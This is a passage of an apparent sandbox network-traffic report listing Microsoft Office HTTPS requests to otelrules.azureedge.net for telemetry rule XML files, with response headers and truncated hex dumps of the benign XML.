                                                                                                        2024-12-09 12:50:29 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        128192.168.2.84985413.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:29 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:30 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:29 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1405
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                        ETag: "0x8DC582BE89A8F82"
                                                                                                        x-ms-request-id: 98bbe38a-d01e-002b-337a-4925fb000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125029Z-r1cf579d778pftsbhC1EWRa0gn00000002zg000000002v4e
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:30 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        129192.168.2.84985513.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:29 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:30 UTC515INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:29 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1368
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                        ETag: "0x8DC582BE51CE7B3"
                                                                                                        x-ms-request-id: e2b58513-401e-0083-6eae-49075c000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125029Z-r1cf579d778gg9hlhC1EWRh7nw000000012g0000000011k9
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        X-Cache-Info: L1_T2
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:30 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        130192.168.2.84985113.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:30 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:30 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:30 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1388
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                        ETag: "0x8DC582BDBD9126E"
                                                                                                        x-ms-request-id: 4471680c-501e-0047-7105-48ce6c000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125030Z-r1cf579d7789trgthC1EWRkkfc0000000900000000007ud8
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:30 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        131192.168.2.84985613.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:31 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:31 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:31 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1415
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                        ETag: "0x8DC582BDCE9703A"
                                                                                                        x-ms-request-id: 8337024b-c01e-0079-5d05-48e51a000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125031Z-r1cf579d7786c2tshC1EWRr1gc000000082g000000003d7d
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:31 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        132192.168.2.84985713.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:31 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:31 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:31 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1378
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                        ETag: "0x8DC582BE584C214"
                                                                                                        x-ms-request-id: 40072cf2-b01e-001e-4a03-480214000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125031Z-r1cf579d7789trgthC1EWRkkfc000000094g000000002hpg
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:31 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        133192.168.2.84985813.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:31 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:32 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:32 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1407
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                        ETag: "0x8DC582BE687B46A"
                                                                                                        x-ms-request-id: f1085035-901e-007b-3808-48ac50000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125032Z-r1cf579d7788pwqzhC1EWRrpd800000008h00000000086cy
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:32 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        134192.168.2.84985913.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:31 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:32 UTC515INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:32 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1370
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                        ETag: "0x8DC582BDE62E0AB"
                                                                                                        x-ms-request-id: 308ae8da-101e-0028-400e-4a8f64000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125032Z-r1cf579d778gg9hlhC1EWRh7nw000000012g0000000011pe
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        X-Cache-Info: L1_T2
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:32 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        135192.168.2.84986013.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:32 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:32 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:32 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1397
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                        ETag: "0x8DC582BE156D2EE"
                                                                                                        x-ms-request-id: 447ddde3-501e-0047-290a-48ce6c000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125032Z-r1cf579d778dndrdhC1EWR4b240000000840000000001ub6
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:32 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        136192.168.2.84986113.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:33 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:34 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:33 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1360
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                        ETag: "0x8DC582BEDC8193E"
                                                                                                        x-ms-request-id: 848b85bb-b01e-0053-2106-48cdf8000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125033Z-r1cf579d7788pwqzhC1EWRrpd800000008qg000000003kud
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:50:34 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        137192.168.2.84986213.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:50:33 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:50:34 UTC494INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:50:34 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 1406
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                        ETag: "0x8DC582BEB16F27E"
                                                                                                        x-ms-request-id: 1c840c04-c01e-0034-5806-482af6000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T125034Z-r1cf579d778z4wflhC1EWRa3h000000008b0000000006y3a
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
